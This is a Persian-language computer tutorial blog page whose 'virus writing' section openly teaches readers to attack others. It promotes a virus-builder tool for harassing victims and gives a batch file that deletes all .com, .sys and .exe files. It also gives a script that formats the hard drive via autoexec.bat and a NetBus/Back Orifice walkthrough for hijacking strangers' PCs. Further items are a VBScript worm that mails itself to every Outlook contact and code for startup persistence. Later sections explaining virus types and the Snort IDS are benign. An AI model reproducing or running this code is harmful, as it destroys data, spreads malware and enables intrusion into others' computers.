تبليغاتX
پرتال تخصصی کامپیوتر Www.Hashemi64.ir
     
   
   
  منوي اصلي
لينکهاي سريع
 
  موضوعات
آموزش نفوذ و هک
امنیت و شبکه
رفع اشكال/سخت افزار / نرم افزار
دانلود كتاب و جزوه رشته كامپيوتر
بانک اطلاعات معماری (پك فروشي)
ویروس/ آنتي ويروس / آپديت
ويژوال بيسيك VB.6
برنامه نويسي پاسكال
سي و سي ويژوال , ++‍‍C
نمونه كار برنامه نويسي
برنامه نویسی فلش
زبان اسمبلی
ساختمان داده ها
هوش مصنوعی
دانلود نرم افزار
آموزش Html - قالب برای وبلاگ
شبكه - اينترنت
ترفندستان
كتابخانه الكترونيكي
مقالات
رشته مهندسي شيمي
رشته مهندسی صنایع
مقالات رشته الكترونيك
مقالات رشته مكانيك
مقالات رشته معماري
اجتماعی فرهنگی
خدمات ما به بازدید کننده
بازی فلش
داستان و مطالب جالب
برنامه های فارسی
شهر گچساران
سایت های مفید
کلیپ های فلش
خنده های زورکی !
اخر زمان و منجی موعود
موبايل
 

 

آرشيو ماهانه
آبان 1388
خرداد 1388
اردیبهشت 1388
فروردین 1388
اسفند 1387
بهمن 1387
دی 1387
آذر 1387
آبان 1387
مهر 1387
شهریور 1387
تیر 1387
ادمه ي آرشيو ماهانه
 
        لينک دوستان
 

 

لوگوي دوستان

روز نوشته هاي يك دانشجو / اسماعيل هاشمي


روز نوشته هاي يك دانشجو / اسماعيل هاشمي


 


 

تبليغات







دست نوشته هاي اخرين ديوانه (شعر ، ادبي )

روز نوشته هاي يك دانشجو (سياسي ، اجتماعي ، فرهنگي ، دانشگاه آزاد واحد گچساران )


  ویروس

اخبار  Virus & Spmویروس نویسی

 صفحه اصلی ویروس


هر هفته یک مطلب جدید

برنامه ای برای ساخت ویروس

توضیح :

Toxic-CV یک نرم افزاره که می تونه یک ویروس با قابلیت ها یی که شما  انتخاب می کنید درست کنه .
شما می تونید این ویروس رو به کسی که می خواین اذیتش کنین بفرستین . در ضمن Cv  مخفف Custimized Virus  هست .

قابلیت های برنامه :
1-راه اندازی در StartUp (بدون نمایش در Msconfig)
2-غیر فعال کردن TaskMgr,Msconfig,Regedit,Norton Anti Virus,Mcafee Antivirus,Windows Firewall
3-قابلیت تعیین نام ویروس بعد از Install 
4-پشتیبانی از پسوند ها مهم فایل های اجرایی مانند : exe , scr, bat ,  cmd , pif
5-قابلیت انتخاب Icon ویروس 
5-پیغام خطای کاذب ( Fake Message )
6-قابلیت بخشیدن قربانی به  2 صورت
7-قابلیت های  آزار قربانی مانند : پر کردن هارد ، بوق زدن ! ، کم کردن سرعت کامپیوتر ، و ....
8- حجم بسیار کم : 10-9 کیلوبایت                   Toxic-Cv                             

آموزش استفاده از برنامه : 
برنامه رو اجرا کنید و در صفحه ی About  روی Ok  کلیک کنید ( نه بابا )
خوب تو صفحه ی اصلی  بخش اول یعنی  General Settings واضحه  و معمولا تو بیشتر Ps ها هم هست .بخش  Exe Icon & Name  هم که واضحه و به نام و Icon ویروس قبل از اینکه نصب شه اشاره داره
بخش Fake Message هم که واضح تر از همست . 

بخش Forgive Victim : این بخش واسه انتخاب گزینه هایی برای تنظیم بخشش  یا عدم بخشش قربانی هست . خوب شما اینجا سه تا گزینه می بینید :

الف : Forgive victim with this password : با انتخاب این گزینه اون قربانی که ویروس تو کامپیوترش اینستال شده با فشار دادن Alt + Ctrl + Del صفحه ای رو می بیینه که ازش یک رمز
می خواد اگه قربانی اون رمزی رو که شما در روبه روی این گزینه وارد کردید  رو وارد کنه . ویروس غیر فعال می شه .

ب  : Forgive victim after a restart : با انتخاب این گزینه ویروس بعد از یک ریستارت غیر فعال می شه .

چ  : Don't forgive victim : با انتخاب این گزینه ویروس  به هیچ وجه غیر فعال نمیشه .  


حالا می رسیم به بخش  Enable  & Disable Viruses  : تو این بخش شما می تونید قسمت های مختلف آزار قربانی خودتان رو در ویروس فعال یا غیر فعال کنید .
شرح قسمت ها مختلف :

1-Gardually decrease system speed : اگه این گزینه انتخاب بشه ویروس به تدریج سرعت سیستم رو کم می کنه تا جایی که ....  .

2-Gradually fill the hard : اگه این گزینه انتخاب بشه ویروس به تدریج  هارد رو پر می کنه تا جایی که ....  .

3-Disable Yahoo! Messenger : اگه این گزینه انتخاب بشه ویروس یاهو مسنجر رو غیر فعال می کنه ! 

4-Beep every second : اگه این گزینه انتخاب شه ویروس هر ثانیه بوق می زنه !

5-Swap mouse buttons every 30 seconds for 10 seconds : اگه این گزینه انتخاب شه ویروس هر 30 ثایه به مدت 10 ثانیه جای دکمه های ماوس رو عوض می کنه !

6-Shutdown computer every 20 minutes  : اگه این گزینه انتخاب شه ویروس بعد از 20 دقیقه که از روشن شدن کامپیوتر / اجرا شدن ویروس  بگذره سیستم قربانی رو شات داون می کنه .

7-Lock Computer Every 30 seconds for 10 seconds : اگه این گزینه انتخاب شه ویروس هر 30 ثانیه  به مدت 10 ثانیه کامپیوتر رو قفل می کنه .

وقتی همه ی تنظیمات رو انجام دادید روی Create Virus  کلیک کنید فایل ویروس به نامی که شما در قسمت  Exe name وارد کردید در پوشه ای که برنامه توش اجرا شده ساخته می شه .

Download Toxic-Cv        


 

 

 

خوب ساختن ویروس رو آغاز می کنم 
notepad باز شد پنجره این ها رو بنویسید توش

@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========

خوب تایپ کردن دیگه بسه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند را با نام bat بگذارید ، مثل gach18.bat

خوب کار دیگه تموم شد این ویروس رو اگر کسی باز کنه کامپیوتر رو با یک خاک مساوی می کنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار می اندازه

 دوستان با دادن نظر من رو برای بهتر شدن کار راهنمایی کنید


آموزش قدم به قدم ویروس نو یسی با (نت پد)
قسمت اول ویروس بلاستر:
امروز يادميگيريم كه:
1-
چگونه ويروس Blaster را بسازيم
2-
چگونه براي BatchFile ها آيكون بسازيم
3-
چگونه خودمان در Notepad ترفند كشف كنيم!!!
فكر ميكنم همه شما ويروس Blaster را بشناسيد ويروسي كه باعث Shutdown شدن كامپيوتر در 60 ثانيه ميشد... و حتي عده كثيري از شما روش ساخت آن را بدانيد ولي در پايان اين سري مقالات و جهت تكميل اين سري از مقالات لازم ميدانم نگاهي سريع به آن بيندازيم و سپس به نكات تكميلي اين سري مقالات ميپردازيم. اين ويروس را به طرق مختلفي و با دستورات گوناگوني ميتوان نوشت كه در اينجا دو روش را مورد بررسي قرار ميدهيم در ضمن لطفا اگر با اين دستورات از قبل آشنايي نداريد حتما از Copy/Paste استفاده كنيد .
روش اول/ با استفاده ازShortcut در جايي از دسكتاپ خود Right Click كنيد و در بخش New گزينه Shortcut را انتخاب كنيد و در بخش ظاهر شده يكي از دستورات زير را وارد كنيد:
shutdown -s -t xx -1
windir%system32shutdown.exe -s -t xx% -2

توضيح: بعد از اينكه Paste كرديد به جاي xx در دستورات بالا مدت زماني را بر حسب ثانيه قرار دهيد تا كامپيوتر پس از آن زمان خاموش شود. سپس Next را بزنيد و براي فايل خود يك نام برگزينيد و كار تمام است!!.
روش دوم/ به كمكNotepad نت پد را باز كنيد و باز هم يكي از دو دستور بالا را در آن Paste كنيد و حالا فايل خود را با پسوند bat يعني با نامي مثل shutdown.bat سيو كنيدفكر ميكنم تا به حال بايد متوجه شده باشيد كه bat مخفف BatchFile است. براي پادزهر درست كردن براي اين ويروس هم ميتوانيد از دستور زير استفاده كنيد:
shutdown -a
و همه مراحل قبل را انجام دهيد. اين دستور هم از هر دو راه فوق قابل اجرا است. حالا ميرسيم به نكات تكميلي در مورد مقالات اين يك هفته:
خيلي ها سوال ميكنند كه چگونه ميتوان براي BatchFile ها آيكون انتخاب كرد. بايد بگويم يكي از ساده ترين روشها كه به هيچ نرم افزار خاصي نياز ندارد اين است كه شما از BatchFile مورد نظر يك Shortcut بسازيد و براي Shortcut براحتي آيكون انتخاب كنيد و فايل اصلي را Hidden كنيد .
تا به حال هيچ به اين فكر افتاده ايد كه اگر در كامپيوتري Notepad و Wordpad و Microsoft Word نصب نشده باشد شما اين همه ترفند را كجا ميخواهيد پياده كنيد؟؟؟!!!. آيا ميدانيد هكرها معمولا در محيط متني ديگري بجز اينها اقدام به نوشن برنامه ميكنند؟؟. بله اين محيط متني به نسبت ناشناخته همان اديتور داس Dos Editor است. شما در اين اديتور ميتوانيد كد برنامه ها را ببينيد!. براي وارد شدن به اين محيط وارد داس شويد و تايپ كنيد Edit صبر كنيد!!!قبل از اينكه وارد اين محيط شويد بايد بدانيد بر خلاف محيط بي آزار نت پد محيط Dos Editor بسيار بسيار خطرناك است. هرگونه تغييري كه خواسته يا ناخواسته در متن كد ها بوجود آوريد امكان هيچگونه بازگشت ندارد اينجا از كليدي به نام Undo خبري نيست!! همچنين همه تغييرات بطور خودكار سيو ميشود و هيچگاه موقع خروج از اديتور ازشما سوال نميشود كه Do you want to save changes و همه چيز بطور خودكار ذخيره شده و اگر احيانا كد فايل هاي اصلي سيستم را دستكاري كنيد حتي System Restore و Backup هاي رجيستري هم به دادتان نخواهند رسيد... اما براي اينكه كار با اديتور آشنا شويد و خودتان ترفندي كشف كنيد مطابق زير عمل كنيد:
1-
وارد داس شويد و تايپ كنيد Edit تا وارد اديتور شويد كه صفحه اي آبي رنگ است
2-
از منوي بالاي صفحه File را انتخاب و روي Open كليك كنيد.
3-
به اين مسير برويد:C / WINDOWS و در پنجره سمت چپ دنبال فايلي به نام explorer.scf بگرديد اگر يادتان باشد شما در مقالات قبلي فايل ديگري را نيز با پسوند scf ساخته بوديد... يادتان مي آيد؟؟آيكون Show Desktop بود.
4-
متني كه در آن ميبينيد را عينا درون Notepad وارد كنيد و فايل خود را باهمان پسوند scf سيو كنيد. به اين طريق برنامه explorer.scf بر روي صفحه ظاهر ميشود.. بله شما اولين ترفند خود را خودتان ساختيد!!! به اين وسيله شما ميتوانيد خودتان در Notepad ترفند كشف كنيد!!!! من هم به همين طريق اين ترفندها را براي شما مي نوشتم.

 


 

 

 

با یک کلیک هارد را فرمت کنید!!!

سلامی از روی ارادت و نه از روی عادت به تمامی دوستان عزیز که به من لطف دارید

دوستان اگر میخواهید با یک کلیک هاردتان Format (پاک) شود این کدها را در Note

pad ریخته و آنرا با پسوند Bat ذخیره کنید مثلا Format Hard.bat حال مواظب باشید

 که روی آن کلیک نکنید چون هارد شما صفر کیلومتر خواهد شد موفق باشید در پناه

حق!

@echo off
call attrib -r -h c:\autoexec.bat
echo @echo off >c:\autoexec.b
echo format /autotest c:/q>nul
call attrib +r +h c:\autoexec.ba
exit


 

 

 
سلام دوباره به شما عزيزان.شما با اين آموزش می توانيد بدون ارسال فايل و کاملا باکلاس پسورد اینترنت مردم رو هک کنید.اينم بگم كه این کار خیلی بی رحمانه هست و به من هیچ ربطی نداره!!!!!!!!
ما به این برنامه ها احتیاج داریم که همش تو خود ویندوز هست: BACK ORFICE. Wingate.Netbus.Telnet
اول وارد Wingate شده و در جایی که نوشته شده HOST NAME آی پی قربانی رو قرار می دیم و در قسمت بعدی به Scan port رفته و Defualt برنامه که Port 23 هست رو به 12345 تغییر میدهیم و گزینه سوم که try to open port only هست را انتخاب و اسکن رو بزنید. البته در اينجا ميتونيد از يه RANGE IP هم استفاده كنيد وهم مي تونيد اي پي قرباني رو بدهيد و در صورت باز بودن پورت ميتونيد مراحل بعدي رو اجرا كنيد. حالا ما فرض رو بر اين ميذاريم كه يه Range Ip دادیم. بعد از اسکن شما با قسمتی به نام Server Found مواجه می شوید که یکسری آی پی را با پورتهای باز مورد نظر شما پیدا کرده که در ادامه باید یکی از آی پی هارو به دلخواه انتخاب کنید.
در قسمت بعدي NETBUS را باز كرده و در جاي Hostname/IP اي پي مورد نظر را وارد كنيد و در ادامه ي كار اگر از شما پسسورد بخواهد بايد از Telnet استفاده كنيد و اگر نخواهد كه كار تقريبا تمومه . حالا فرض ميكنيم كه پسسورد خواست بايد مراحل زير را طي كنيد:

به قسمت RUN رفته و CMD را اجرا كرده و بعد Telnet را اجرا كنيد و اي پي را نوشته و بعد از پرت 12345 استفاده كنيد در پنجره Netbus براي كرك پسوورد اين نوشته را وارد كنيد: Password;1;123serverPWD;Y4hoo

شما ميتونيد پسورد ديگه اي هم بذاريد حالا با Netbus دوباره وصل شده و پسورد را Y4hoo ميزنيد

همه چيز در دست شماست

حالا به قسمت File Manager رفته و سرور را به سيستم طرف ارسال كنيد و در قسمتي كه از شما پرسيد سرور را به كجا بفرستم شما ادرس C:Windows را ميدهيد .و قسمت دانلود را ميبنديم . حالا كارمون با Netbus تموم شد .

حالا به BACK ORFICE ميريم و در قسمت Target Host اي پي طرفو ميزنيم و پرت 12345 و باز در قسمت بعدي پسورد را زده و SEND را ميزنيم

با اين روش كارهاي زيادي ميشه انجام داد !
امیدوارم که خوشتون اومده باشه. تا مقاله بعدی فعلا بای.

 

ویروس

صفحه اصلی

ویروس و ضدویروس

حجم عظیم ویروس ها، کرم ها، ایرادات نرم افزارها و تهدیدهای ناشی از آنها، نرم افزارهای ضدویروس را تبدیل به یکی از ابزارهای لازم برای همه کامپیوترها نموده است. در صورت آلوده شدن یک کامپیوتر به ویروس بسته به نوع آن ممکن است مصائب مختلفی برای سیستم کامپیوتری بوجود آید که در پاره ای موارد جبران آن ها هزینه های زیادی را تحمیل می کند. آسیب های بعضی از ویروس ها به گونه ای است که آثار سوء آن ها را به هیچ وجه نمی توان از بین برد. مستقل از نوع ویروسی که باید با آن مقابله شود نیاز به برنامه های ضد ویروس همواره وجود دارد و در شرایطی که محصولات ضد ویروس متنوعی تولید شده اند، انتخاب نرم افزار مناسب دغدغه کاربران می باشد.

این مقاله ضمن معرفی انواع ویروس ها، نحوه عمل کرد برنامه های ضدویروس و انواع ویروس هایی که ضدویروس ها شناسایی و پاکسازی می کنند را معرفی می کند. همچنین اطلاعاتی که برای انتخاب ابزار مناسب لازم است بیان شده و تعدادی از برنامه های ضد ویروس با هم مقایسه  خواهند شد.

ویروس چیست؟

ویروس های کامپیوتری برنامه هایی هستند که مشابه ویروس های بیولوژیک گسترش  یافته و پس از وارد شدن به کامپیوتر اقدامات غیرمنتظره ای را انجام می دهند. با وجودی که همه ویروس ها خطرناک نیستند، ولی بسیاری از آنها با هدف تخریب انواع مشخصی از فایل ها، برنامه های کاربردی و یا سیستم های عامل نوشته شده اند.

 ویروس ها هم مشابه همه برنامه های دیگر از منابع سیستم مانند حافظه و فضای دیسک سخت، توان پردازنده مرکزی و سایر منابع بهره می گیرند و می توانند اعمال خطرناکی را انجام دهند به عنوان مثال فایل های روی دیسک را پاک کرده و یا کل دیسک سخت را فرمت کنند. همچنین یک ویروس می تواند مجوز دسترسی به دستگاه را از طریق شبکه و بدون احراز هویت فراهم آورد.

برای اولین بار در سال ۱۹۸۴ واژه «ویروس» در این معنا توسط فرد کوهن در متون آکادمیک مورد استفاده قرار گرفت. د‍ر این مقاله که «آزمایشاتی با ویروس های کامپیوتری» نام داشت نویسنده دسته ای خاص از برنامه ها را ویروس نامیده و این نام گذاری را به لئونارد آدلمن نسبت داده است. البته قبل از این زمان ویروس ها در متن داستان های عملی و تخیلی ظاهر شده  بودند.

انواع ویروس

انواع ویروس های رایج را می توان به دسته های زیر تقسیم بندی نمود:

boot sector :

 boot sector  اولین Sector  بر روی فلاپی و یا دیسک سخت کامپیوتر است. در این قطاع کدهای اجرایی ذخیره شده اند که فعالیت کامپیوتر با استفاده از آنها انجام می شود. با توجه به اینکه در هر بار بالا آمدن کامپیوتر Boot sector مورد ارجاع قرار می گیرد، و با هر بار تغییر پیکربندی کامپیوتر محتوای boot sector هم مجددا نوشته می شود، لذا این قطاع مکانی بسیار آسیب پذیر در برابر حملات ویروس ها می باشد.

این نوع ویروس ها از طریق فلاپی هایی که قطاع boot آلوده دارند انتشار می یابند. Boot sector  دیسک سخت کامپیوتری که  آلوده شود توسط ویروس آلوده شده و هر بار که کامپیوتر روشن می شود، ویروس خود را در حافظه بار کرده و منتظر فرصتی برای آلوده کردن فلاپی ها می ماند تا بتواند خود را منتشر کرده و دستگاه های دیگری را نیز آلوده نماید. این گونه ویروس ها می توانند به گونه ای عمل کنند که تا زمانی که دستگاه آلوده است امکان boot  کردن کامپیوتر از روی دیسک سخت از بین برود.

این ویروس ها بعد از نوشتن بر روی متن اصلی boot سعی می کنند کد اصلی را به قطاعی دیگر بر روی دیسک منتقل کرده و آن قطاع را به عنوان یک قطاع خراب (Bad Sector) علامت گذاری می کند.

Macro viruses:

 این نوع ویروس ها مستقیما برنامه ها را آلوده نمی کنند. هدف این دسته از ویروس ها فایل های تولید شده توسط برنامه هایی است که از زبان های برنامه نویسی ماکرویی مانند مستندات Exel یا Word استفاده می کنند. ویروس های ماکرو از طریق دیسک ها، شبکه و یا فایل های پیوست  شده با نامه های الکترونیکی قابل گسترش می باشد.

ویروس تنها در هنگامی امکان فعال شدن را دارد که فایل آلوده باز شود، در این صورت ویروس شروع به گسترش خود در کامپیوتر نموده و سایر فایل های موجود را نیز آلوده می نماید. انتقال این فایل ها به کامپیوتر های دیگر و یا اشتراک فایل بین دستگاه های مختلف باعث گسترش آلودگی به این ویروس ها می شود.

File infecting viruses:

 فایل های اجرایی (فایل های با پسوند .exe و .com) را آلوده نموده و همزمان با اجرای این برنامه ها خود را در حافظه دستگاه بار نموده و شروع به گسترش خود و آلوده کردن سایر فایل های اجرایی سیستم می نمایند. بعضی از نمونه های این ویروس ها متن مورد نظر خود را به جای متن فایل اجرایی قرار می دهند.

ویروس های چندریخت(Polymorphic):

این ویروس ها در هر فایل آلوده به شکلی ظاهر می شوند. با توجه به اینکه از الگوریتم های کدگذاری استفاده کرده و ردپای خود را پاک می کنند، آشکارسازی و تشخیص این گونه ویروس ها دشوار است.

ویروس های مخفی:

این ویروس ها سعی می کنند خود را از سیستم عامل و نرم افزارهای ضدویروس مخفی نگه دارند. برای این کار ویروس در حافظه مقیم شده و حائل دسترسی به سیستم عامل می شود. در این صورت ویروس کلیه درخواست هایی که نرم افزار ضدویروس به سیستم عامل می دهد را دریافت می کند. به این ترتیب نرم افزارهای ضدویروس هم فریب خورده و این تصور به وجود می آید که هیچ ویروسی در کامپیوتر وجود ندارد. این ویروس ها کاربر را هم فریب داده و استفاده از حافظه را به صورت مخفیانه انجام  می دهند.

ویروس های چندبخشی

رایج ترین انواع این ویروس ها ترکیبی از ویروس های boot sector  و file infecting  می باشد. ترکیب انواع دیگر ویروس ها هم امکان پذیر است.

سایر برنامه های مختل کننده امنیت

برخی از محققین اسب های تروا(Trojan)، کرم ها و بمب های منطقی را در دسته ویروس ها قرار نمی دهند ولی واقعیت این است که این برنامه ها هم بسیار خطرناک بوده و می توانند خساراتی جدی به سیستم های کامپیوتری وارد نمایند.

اسب های تروا تظاهر می کنند که کاری خاص را انجام می دهند ولی در عمل برای هدف دیگری ساخته شده اند، به عنوان مثال برنامه ای که وانمود می کند که یک بازی است ولی در واقع اجازه دسترسی از راه دور یک کاربر به کامپیوتر را فراهم می آورد.

   کرم ها برنامه هایی هستند که مشابه ویروس ها توان تکثیر کردن خود را دارند، ولی برعکس آنها برای گسترش خود نیاز به برنامه هایی دیگر ندارند تا آنها را آلوده کرده و تحت عنوان فایل های آلوده اقدام به انتقال و آلوده کردن دستگاه های دیگر نمایند. کرم ها معمولا از نقاط آسیب پذیر برنامه های e-mail  برای توزیع سریع و وسیع خود استفاده می نمایند.

   بمب های منطقی برنامه هایی هستند که در زمان هایی از قبل تعیین شده؛ مثلا یک روز خاص؛ اعمالی غیر منتظره انجام می دهند. این برنامه ها فایل های دیگر را آلوده نکرده و خود را گسترش نمی دهند.

علی رغم تنوع انواع برنامه های مخرب، برنامه های قوی ضد ویروس می توانند نسخه های مختلف آنها را شناسایی و از بین ببرند. در ادامه این متن برای سادگی به همه انواع این برنامه ها عنوان عمومی ویروس اطلاق می شود.

در بخش های بعدی نرم افزارهای ضدویروس مورد بررسی قرار خواهند گرفت.

 


 

Snort، نمونه‌ای از یک ابزار تشخیص نفوذ شبکه‌ای

 

 

    یک نرم‌افزار تشخیص نفوذ به‌صورت کدباز است که بر روی محیط‌های Linux و Windows عرضه می‌گردد و با توجه به رایگان بودن آن، به یکی از متداول‌ترین سیستم‌های تشخیص نفوذ شبکه‌های رایانه‌یی مبدل شده است. از آن‌جاکه برای معرفی آن نیاز به معرفی کوتاه این دسته از ابزارها داریم، ابتدا به مفاهیمی اولیه درباره‌ی ابزارهای تشخیص نفوذ می‌پردازیم، به عبارت دیگر معرفی این نرم‌افزار بهانه‌یی است برای ذکر مقدمه‌یی در باب سیستم‌های تشخیص نفوذ.

    Intrusion Detection System (IDS) یا سیستم تشخیص نفوذ به سخت‌افزار، نرم‌افزار یا تلفیقی از هر دو اطلاق می‌گردد که در یک سیستم رایانه‌یی که می‌تواند یک شبکه‌ی محلی یا گسترده باشد، وظیفه‌ی شناسایی تلاش‌هایی که برای حمله به شبکه صورت‌ می‌گیرد و ایجاد اخطار احتمالی متعاقب حملات، را بر عهده دارد.

    IDSها عملاً سه وظیفه‌ی کلی را برعهده دارند : پایش، تشخیص، واکنش. هرچند که واکنش در مورد IDSها عموماً به ایجاد اخطار، در قالب‌های مختلف، محدود می‌گردد. هرچند دسته‌یی مشابه از ابزارهای امنیتی به نام Intrusion Prevention System (IPS) وجود دارند که پس از پایش و تشخیص، بسته‌های حمله‌های احتمالی را حذف می‌کنند. نکته‌یی که در این میان باید متذکر شد، تفاوت و تقابل میان Firewallها و IDSها است. از آن‌جاکه ماهیت عمل‌کرد این دو ابزار با یکدیگر به کلی متفاوت است، هیچ‌یک از این دو ابزار وظیفه‌ی دیگری را به طور کامل برعهده نمی‌گیرد، لذا تلفیقی از استفاده از هردو ابزار می‌تواند امنیت کلی سیستم را بالا ببرد.

 

    در حالت کلی IDSها را می‌توان به دو دسته‌ی کلی تقسیم‌بندی نمود :

- Network IDS (NIDS)

- Host IDS (HIDS)

    HIDSها، اولین سیستم IDSی هستند که در یک سیستم رایانه‌ای باید پیاده‌سازی شود. معیار تشخیص حملات در این سیستم‌ها، اطلاعات جمع‌آوری شده بر روی خادم‌های مختلف شبکه است. برای مثال این سیستم با تحلیل صورت عملیات انجام شده، ذخیره شده در پرونده‌هایی خاص، سعی در تشخیص تلاش‌هایی که برای نفوذ به خادم مذکورد انجام شده است دارد. این تحلیل‌ها می‌تواند به صورت محلی بر روی خود خادم انجام گردد یا به سیستم تحلیل‌گر دیگری برای بررسی ارسال شود. یک HIDS می‌تواند تحلیل اطلاعات بیش از یک خادم را بر عهده بگیرد.

 

    با این وجود، اگر نفوذ‌گر جمع‌آوری صورت عملیات انجام‌شده بر روی هریک از خادم‌های مورد نظر را به نحوی متوقف کند، HIDS در تشخیص نفوذ ناموفق خواهد بود و این بزرگ‌ترین ضعف HIDS است.

    NIDSها، به عنوان دومین نوع IDSها، در بسیاری از موارد عملاً یک Sniffer هستند که با بررسی بسته‌ها و پروتکل‌های ارتباطات فعال، به جستجوی تلاش‌هایی که برای حمله صورت می‌گیرد می‌پردازند. به عبارت دیگر معیار NIDSها، تنها بسته‌هایی است که بر روی شبکه‌ها رد و بدل می‌گردد. از آن‌جایی‌که NIDSها تشخیص را به یک سیستم منفرد محدود نمی‌کنند، عملاً گسترده‌گی بیش‌تری داشته و فرایند تشخیص را به صورت توزیع‌شده انجام می‌دهند. با این وجود این سیستم‌ها در رویایی با بسته‌های رمزشده و یا شبکه‌هایی با سرعت و ترافیک بالا کارایی خود را از دست می‌دهند.

 

    با معرفی انجام شده در مورد دو نوع اصلی IDSها و ضعف‌های عنوان شده برای هریک، واضح است که برای رسیدن به یک سیستم تشخیص نفوذ کامل، به‌ترین راه استفاده‌ی همزمان از هر دو نوع این ابزارهاست.

 

     Snort، در کامل‌ترین حالت نمونه‌یی از یک NIDS است. این نرم‌افزار در سه حالت قابل برنامه‌ریزی می‌باشد :

  • حالت Sniffer

    در این حالت، این نرم‌افزار تنها یک Sniffer ساده است و محتوای بسته‌های ردوبدل شده بر روی شبکه را بر روی کنسول نمایش می‌دهد.

  • حالت ثبت‌کننده‌ی بسته‌ها

Snortدر این وضعیت، اطلاعات بسته‌های شبکه را در پرونده‌یی که مشخص می‌شود ذخیره می‌کند.

  •  سیستم تشخیص نفوذ

    در این پیکربندی، بر اساس دو قابلیت پیشین و با استفاده از قابلیت تحلیل بسته‌ها و قوانینی که تعیین می‌گردد، Snort امکان پایش و تحلیل بسته و تشخیص نفوذ را یافته و در صورت نیاز واکنش تعیین شده را به‌روز می‌دهد.

 

    حالت پیش‌فرض خروجی این ابزار فایلی متنی است که می‌تواند در آن ابتدای بسته‌ها را نیز درج کند. با این وجود در صورتی‌که این ابزار در حال فعالیت بر روی ارتباطات شبکه‌یی با سرعت بالا می‌باشد به‌ترین راه استفاده از خروجی خام باینری و استفاده از ابزاری ثانویه برای تحلیل و تبدیل اطلاعات خروجی است.

 

    بُعد دیگر از پیکربندی Snort به عنوان یک سیستم تشخیص نفوذ، استفاده از قوانین برای ایجاد معیار نفوذ برای Snort است. برای مثال می‌توان با قانونی، Snort را مکلف ساخت که نسبت به دسترسی‌های انجام شده مبتنی بر پروتکلی تعیین شده از/به یک پورت خاص و از/به یک مقصد معین با محتوایی شامل رشته‌یی خاص، اخطاری یا واکنشی ویژه را اعمال کند.

 

    نکته‌یی که باید در نظر داشت این‌ است که از آن‌جاکه Snort را می‌توان به گونه‌یی پیکربندی نمود که قابلیت تشخیص حمله توسط ابزارهای پویش پورت را نیز داشته باشد، لذا با وجود استفاده از Snort نیازی به استفاده از ابزاری ثانویه برای تشخیص پویش‌گرهای پورت وجود ندارد.

 

    همان‌گونه که گفته شد، Snort با قابلیت‌های نسبتاً کاملی که در خود جای داده‌است، به همراه رایگان بودن آن و قابلیت نصب بر روی محیط‌ها و سیستم‌های عامل متدوال، به یکی از معمول‌ترین IDSهای کنونی مبدل شده است. برای دریافت این نرم‌افزار و همچنین اطلاعات جامعی در مورد آن می‌توانید به پای‌گاه اصلی آن، www.snort.org، مراجعه کنید.

 


اموزش : برنامه خود را از طریق ادرس ایمیل دیگران در تمام جهان پخش کنید

شما با استفاده از اتلوک اکسپرس می تونید برنامه به ویژه ویروس خودتون رو در سرار جهان پخش کنید این روشی که من الان می نویسم یکی از روش های پخش ویروس هاست ولی خوب با استفاده از این روش می تونید برنامه یا هرچی رو در تمام جهان پخش کنید

Code:
Set OutlookApp = CreateObject("Outlook.Application") If Not OutlookApp = "" Then For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists For UserGroup = 1 To ContactSwitch.AddressEntries.Count Set OutlookEmail = OutlookApp.CreateItem(0) OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup) OutlookEmail.Subject = "Check this out!" OutlookEmail.Body = "Look at the file in the attachments, It's great! :P" OutlookEmail.Attachments.Add WScript.ScriptFullName OutlookEmail.DeleteAfterSubmit = True OutlookEmail.Send Next Next End If OutlookEmail.Subject = "Check this out!" OutlookEmail.Body = "Look at the file in the attachments, It's great! :P" OutlookEmail.Attachments.Add WScript.ScriptFullName

اگه متوجه نشدید ناراحت نشید چون قرار نیست که همه متوجه بشن اگه این طوری باشه همه ملت ویروس نویس می شن فقط اونهای که تو این کار (ویروس نویسی ) هستن می دونن این کد چه ارزشی داره . در ضمن تا یادم نرفته اقا من ویروس نویس نیستم ( نکنه یه دفعه برام ویروس بفرستن حالم رو بگیرن ) من برای تفریح با این ویروس ها ور می رفتم ازشون یه چیز های یاد گرفتم
خوب چون این تاپیک به درد تازه کار ها هم خوره یه اموزش مقدماتی می دم که برای ویروس نویسی هم به کار می یاد
1)اجرای برنامه در استارتاپ:
با استفاده از کد زیر می تونید برنامه ای که می نویسید تو استارتاپ قرار بدید

Code:
Set Reg = CreateObject("wscript.shell") Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"

نوشته شده توسط اسماعیل هاشمی در پنجشنبه سوم دی 1383

 

 

مطالب پيشين

شما کدامیک از آنتی ویروس های موجود را پیشنهاد می کنید؟
18 آبان / اپديت Nod32
بانک اطلاعات معماری شماره یک
مثال عینی مفهوم وراثت در ++C
16 آبان / اپديت Nod32
با افزودن پسورد دوم براي ورود به ویندوز XP امنیت خود را بالا ببرید ...
دليل مهم براي نصب Xp Service pack 2
حل تمرين برنامه سازی پیشرفته
دانلود جزوات بسیار عالی و مرتب آموزش ‍++C‍‍
12 آبان / اپديت Nod32
نحوه از بین بردن ویروس کظم غیظ (Kazme_Gheyz) چگونه است؟
انتقال Update آنتی ویروس ESET Nod32
9 آبان / اپديت Nod32
حملات DoS
نحوه قرار دادن کلیپ‏های فلش در اسلایدهای پاورپوینت


  درباره

ورود به كنترل پنل



سرور کسی نیست جز خدای بخشنده و مهربان

اولين پايگاه آموزشي شهرستان گچساران با 5 سال سابقه فعاليت

اين وب سایت ، فضايی است برای انتشار لينک‌های مفيد؛ معرفی هرچه که خواندنی، ديدنی يا شنيدنی ا‌ست. اين وب سایت به هدف آگاهی‌رسانی و بازتاب‌دادنِ مطالب خواندنی در فضای رايانه‌ای شکل گرفته است. "گچساران18"‌ یک نهاد یا یک کانون نیست؛ تنها یک "وب سایت اموزشی" ‌است و کم‌ترین تعهدی به هیچ‌یک از نهادها، گروه‌ها، اشخاص و تفکرها ندارد. اين وبلاگ، به‌طور مستقل و بدون صافی عمل می‌کنند و طبيعی است که هر کس سليقه‌ی خود را در انتخاب مطالب در پيش گيرد. اين کار ، نماينده‌ی هيچ تشکّل و انديشه ويژه‌ی سياسی، فرهنگی يا قومی نيست. فقط معرف شهر گچساران به بازدید کننده است .

